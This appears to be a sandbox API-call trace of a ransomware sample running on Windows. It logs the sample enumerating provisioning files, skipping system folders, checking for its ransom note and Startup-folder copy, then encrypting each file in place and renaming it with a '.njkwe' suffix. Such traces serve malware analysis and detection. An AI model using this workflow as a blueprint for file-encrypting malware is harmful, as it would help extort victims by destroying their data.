lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\134__Connections_Cellular_Sonera (Finland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\134__connections_cellular_sonera (finland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.729] GetProcessHeap () returned 0xbe0000 [0076.729] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.729] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905691e4, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x905691e4, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x905691e4, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml", cAlternateFileName="135__C~1.PRO")) returned 1 [0076.729] lstrcmpiW (lpString1="135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.729] lstrcmpiW (lpString1="135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.729] lstrcmpiW (lpString1="135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.729] lstrcmpiW (lpString1="135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.729] lstrcmpiW (lpString1="135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.729] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml") returned 161 [0076.730] StrStrIW (lpFirst="135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.730] lstrcmpW (lpString1="135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.730] lstrcmpW (lpString1="135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.730] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\135__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.730] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\135__connections_cellular_bouygues (france)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.730] GetTickCount () returned 0x1153852 [0076.730] GetTickCount () returned 0x1153852 [0076.730] GetTickCount () returned 0x1153852 [0076.730] GetTickCount () returned 0x1153852 [0076.730] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.730] GetProcessHeap () returned 0xbe0000 [0076.730] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.730] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0076.732] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.732] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0076.732] GetProcessHeap () returned 0xbe0000 [0076.732] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.732] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.732] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.733] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.733] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.733] CloseHandle (hObject=0x43c) returned 1 [0076.733] GetProcessHeap () returned 0xbe0000 [0076.733] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.733] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0076.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\135__connections_cellular_bouygues (france)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\135__Connections_Cellular_Bouygues (France)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\135__connections_cellular_bouygues (france)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.734] GetProcessHeap () returned 0xbe0000 [0076.734] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.734] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905691e4, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x905691e4, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x905691e4, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml", cAlternateFileName="136__C~1.PRO")) returned 1 [0076.734] lstrcmpiW (lpString1="136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.734] lstrcmpiW (lpString1="136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.734] lstrcmpiW (lpString1="136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.734] lstrcmpiW (lpString1="136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.734] lstrcmpiW (lpString1="136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.734] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml") returned 161 [0076.734] StrStrIW (lpFirst="136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.734] lstrcmpW (lpString1="136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.734] lstrcmpW (lpString1="136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.734] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\136__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\136__connections_cellular_bouygues (france)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.734] GetTickCount () returned 0x1153862 [0076.735] GetTickCount () returned 0x1153862 [0076.735] GetTickCount () returned 0x1153862 [0076.735] GetTickCount () returned 0x1153862 [0076.735] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.735] GetProcessHeap () returned 0xbe0000 [0076.735] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.735] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0076.736] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.736] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0076.737] GetProcessHeap () returned 0xbe0000 [0076.737] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.737] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.737] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.737] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.737] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.737] CloseHandle (hObject=0x43c) returned 1 [0076.737] GetProcessHeap () returned 0xbe0000 [0076.737] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.737] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0076.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\136__connections_cellular_bouygues (france)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\136__Connections_Cellular_Bouygues (France)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\136__connections_cellular_bouygues (france)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.738] GetProcessHeap () returned 0xbe0000 [0076.738] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.738] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905691e4, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x905691e4, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x905691e4, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="137__C~1.PRO")) returned 1 [0076.738] lstrcmpiW (lpString1="137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0076.738] lstrcmpiW (lpString1="137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0076.738] lstrcmpiW (lpString1="137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0076.738] lstrcmpiW (lpString1="137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0076.738] lstrcmpiW (lpString1="137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0076.738] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0076.738] StrStrIW (lpFirst="137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0076.738] lstrcmpW (lpString1="137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.738] lstrcmpW (lpString1="137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0076.738] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\137__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.738] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\137__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.738] GetTickCount () returned 0x1153862 [0076.738] GetTickCount () returned 0x1153862 [0076.738] GetTickCount () returned 0x1153862 [0076.738] GetTickCount () returned 0x1153862 [0076.738] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.739] GetProcessHeap () returned 0xbe0000 [0076.739] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.739] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1d7, lpOverlapped=0x0) returned 1 [0076.740] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.740] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1d7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1d7, lpOverlapped=0x0) returned 1 [0076.740] GetProcessHeap () returned 0xbe0000 [0076.740] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.740] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.740] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.741] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.741] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.741] CloseHandle (hObject=0x43c) returned 1 [0076.741] GetProcessHeap () returned 0xbe0000 [0076.741] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0076.741] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe") returned 167 [0076.741] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\137__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\137__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\137__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0076.742] GetProcessHeap () returned 0xbe0000 [0076.742] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0076.742] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x905691e4, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x905691e4, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x905691e4, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml", cAlternateFileName="138__C~1.PRO")) returned 1 [0076.742] lstrcmpiW (lpString1="138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0076.742] lstrcmpiW (lpString1="138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0076.742] lstrcmpiW (lpString1="138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0076.742] lstrcmpiW (lpString1="138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0076.742] lstrcmpiW (lpString1="138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0076.742] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml") returned 164 [0076.742] StrStrIW (lpFirst="138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0076.742] lstrcmpW (lpString1="138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0076.742] lstrcmpW (lpString1="138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0076.742] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\138__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0076.742] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\138__Connections_Cellular_Free Mobile (France)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\138__connections_cellular_free mobile (france)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0076.742] GetTickCount () returned 0x1153862 [0076.742] GetTickCount () returned 0x1153862 [0076.742] GetTickCount () returned 0x1153862 [0076.742] GetTickCount () returned 0x1153862 [0076.742] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0076.743] GetProcessHeap () returned 0xbe0000 [0076.743] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0076.743] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c4, lpOverlapped=0x0) returned 1 [0076.744] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.744] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c4, lpOverlapped=0x0) returned 1 [0076.744] GetProcessHeap () returned 0xbe0000 [0076.744] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0076.744] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.745] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0076.745] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0076.745] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0076.745] CloseHandle (hObject=0x43c) returned 1 [0076.745] GetProcessHeap () returned 0xbe0000 [0076.745] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 